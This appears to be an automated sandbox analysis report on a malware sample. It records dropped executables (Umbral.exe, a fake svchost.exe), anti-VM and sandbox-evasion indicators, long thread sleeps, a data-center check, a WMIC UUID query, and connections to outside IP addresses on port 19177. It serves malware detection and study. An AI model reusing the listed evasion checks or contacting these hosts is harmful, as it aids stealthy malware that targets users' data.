              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Check if machine is in data center or colocation facility
              Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeMemory allocated: 8E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeMemory allocated: 1A790000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 253F9290000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeMemory allocated: 253FACF0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 3A90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 3A90000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeMemory allocated: 5A90000 memory commit | memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeMemory allocated: 191C2180000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeMemory allocated: 191DBC80000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599762Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599435Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599308Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599201Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599093Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598983Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598765Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598545Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597955Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597716Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597608Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597500Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597390Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597275Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597170Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597061Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596923Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596797Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596672Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596560Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596451Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596343Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596233Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595907Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595780Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595553Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595201Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595093Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594867Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594530Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594312Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594193Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeWindow / User API: threadDelayed 475Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindow / User API: threadDelayed 769Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindow / User API: threadDelayed 5317Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindow / User API: threadDelayed 3214Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindow / User API: foregroundWindowGot 778Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeWindow / User API: foregroundWindowGot 764Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeWindow / User API: threadDelayed 3618Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeWindow / User API: threadDelayed 5963Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeWindow / User API: windowPlacementGot 1978Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exe TID: 6672Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 4944Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 6948Thread sleep count: 475 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 3004Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exe TID: 6380Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7060Thread sleep count: 769 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 7060Thread sleep time: -76900s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392Thread sleep count: 5317 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392Thread sleep time: -5317000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392Thread sleep count: 3214 > 30Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exe TID: 6392Thread sleep time: -3214000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -28592453314249787s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599874s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599762s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599656s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599546s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599435s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599308s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599201s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -599093s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598983s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598765s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598656s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598545s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598437s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598328s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598218s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -598109s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597955s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597828s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597716s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597608s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597500s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597390s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597275s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597170s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -597061s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596923s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596797s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596672s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596560s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596451s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596343s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596233s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -596125s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595907s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595780s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595672s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595553s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595422s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595312s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595201s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -595093s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594984s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594867s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594750s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594640s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594530s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594422s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594312s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe TID: 7520Thread sleep time: -594193s >= -30000sJump to behavior
              Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599874Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599762Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599546Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599435Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599308Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599201Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 599093Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598983Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598765Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598545Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598437Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 598109Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597955Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597716Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597608Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597500Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597390Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597275Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597170Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 597061Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596923Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596797Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596672Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596560Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596451Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596343Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596233Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 596125Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595907Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595780Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595672Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595553Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595201Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 595093Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594867Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594750Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594640Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594530Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594422Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594312Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeThread delayed: delay time: 594193Jump to behavior
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drBinary or memory string: vboxtray
              Source: Umbral.exe.0.drBinary or memory string: vboxservice
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drBinary or memory string: qemu-ga
              Source: ANDYzz-protected.exe, 00000003.00000002.4131666608.00000191DE220000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo}
              Source: Umbral.exe.0.drBinary or memory string: vmwareuser
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 00000001.00000000.1642162962.00000253F8F32000.00000002.00000001.01000000.00000006.sdmp, Umbral.exe.0.drBinary or memory string: vmusrvc
              Source: netsh.exe, 00000007.00000003.1671541873.00000000009D2000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 0000000A.00000003.1683144115.0000000003742000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
              Source: Umbral.exe.0.drBinary or memory string: vmwareservice+discordtokenprotector
              Source: svchost.exe, 00000002.00000002.4084254403.0000000001494000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Umbral.exe.0.drBinary or memory string: vmsrvc
              Source: Umbral.exe.0.drBinary or memory string: vmtoolsd
              Source: Umbral.exe.0.drBinary or memory string: vmwaretray
              Source: KvS2rT08PQ.exe, 00000000.00000002.1649444082.00000000009DD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: Umbral.exe, 00000001.00000002.1697775557.00000253800DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: Umbral.exe, 00000001.00000002.1698819541.00000253F920C000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000009.00000003.1681145917.0000000000B01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: svchost.exe, 00000002.00000002.4084198852.000000000147D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlld
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 3.124.142.205 19177Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 3.125.223.134 19177Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 3.125.209.94 19177Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\svchost.exeNetwork Connect: 18.158.249.75 19177Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\Umbral.exe "C:\Users\user\AppData\Local\Temp\Umbral.exe" Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost.exe "C:\Users\user\AppData\Local\Temp\svchost.exe" Jump to behavior
              Source: C:\Users\user\Desktop\KvS2rT08PQ.exeProcess created: C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe "C:\Users\user\AppData\Local\Temp\ANDYzz-protected.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\Umbral.exeProcess created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuidJump to behavior
              Source: svchost.exe, 00000002.00000002.4100093724.0000000003BD7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4100093724.000000000400C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/21 | 12:20:06 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 21:16:35 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 08:01:02 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.4105943470.0000000005491000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/26 | 09:43:40 - Program Manager
              Source: svchost.exe, 00000002.00000002.4105943470.0000000004A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 24/04/23 | 23:11:19 - Program Manager
